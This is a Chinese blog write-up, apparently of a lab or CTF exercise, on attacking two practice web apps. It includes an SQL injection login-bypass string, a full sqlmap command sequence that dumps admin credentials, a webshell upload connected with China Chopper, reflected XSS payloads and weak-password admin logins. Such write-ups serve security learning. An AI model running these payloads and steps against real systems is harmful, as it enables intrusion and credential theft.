记一次漏洞挖掘


题目一:PHP网页

0x01 SQl注入

OWASP扫描,爆出sql注入漏洞

利用爆出的万能钥匙(ZAP' OR '1'='1' -- )进行登录

登录成功

0x02 文件上传

第一步登录成功后,发现疑似上传点

直接上传一句话木马

上传成功

菜刀连接

getshell,就可以干坏事拉

0x03 SQL注入

在登录界面查询处发现疑似sql注入处

抓包发现变量名

sqlmap一键注入

1.查询数据库
python sqlmap.py -u http://172.16.12.253/grade/query.php?user=1 --dbs

2.查询grade数据库中表名
python sqlmap.py -u http://172.16.12.253/grade/query.php?user=1 --tables -D grade

3.查询grade库中admins表中的字段
python sqlmap.py -u http://172.16.12.253/grade/query.php?user=1 --columns -T admins -D grade

4.查询grade库中admins表中的字段id,name,pass
python sqlmap.py -u http://172.16.12.253/grade/query.php?user=1 --dump -C "id,name,pass" -T admins -D grade

5.爆破phpmyadmin后台密码
python sqlmap.py -u http://172.16.12.253/grade/query.php?user=1 --users --password

直接登录后台 账号:root 密码:123456

登录成功

0X04 XSS

反射型Xss <全称跨站脚本攻击,是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。>

OWASP ZAP扫描发现XSS

输入<script>alert(/Two groups the strongest/)</script>

成功弹框

题目二:JS网页

0x01 后台

百度搜索JSPGOU框架得到后台地址

访问后台地址

尝试弱口令登录 账号:admin 密码:123456

登录成功

0x02 XSS

输入<script>alert(/Two groups the strongest/)</script>

成功弹窗

0x03 文件上传

在后台发现上传点,可直接上传文件

参考:
http://www.dengtar.com/5148.html
https://www.codercto.com/a/63186.html


文章作者: 简文涛
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 简文涛 !
评论-----昵称和邮箱必填,网址选填
 上一篇
攻防世界-Crypto-进阶 攻防世界-Crypto-进阶
你猜猜题目信息下载附件得到haha.txt,504B0304很明显是Zip的文件头HxD新建文件,将haha.txt中的数据copy进去,命名为1.zip解压1.zip,发现需要解压密码,直接暴力破解得到密码为123456解压后得到flag
2019-07-15
下一篇 
Upload-labs学习笔记 Upload-labs学习笔记
upload-labs包含漏洞类型分类如何判断上传漏洞类型?上传的过程 Pass-01(前端JS绕过)function checkFile() { var file = document.getElementsByName('upl
2019-07-10
  目录